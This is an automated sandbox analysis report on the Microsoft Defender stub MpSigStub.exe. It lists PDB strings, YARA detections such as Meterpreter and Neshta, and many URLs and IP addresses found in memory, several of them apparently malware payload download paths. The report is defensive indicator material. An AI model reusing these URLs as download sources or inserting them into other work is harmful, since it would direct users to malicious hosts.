Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.2859676804.00000000054EC000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2922725864.0000000006136000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.2858017646.000000000543F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918507179.00000000030CC000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp

Spreading:

Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Autohotkey Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
May infect USB drives
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm

Networking:

Yara detected PasteDownloader
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found Tor onion address
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://209.141.35.239/33/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://216.93.188.81/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://27.102.66.105/test.msi
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://27.192.62.107
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://3/upload/all/Decrypter.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://31.210.20.225:8080/server.exe&quot;)
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://3389.space/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.58/
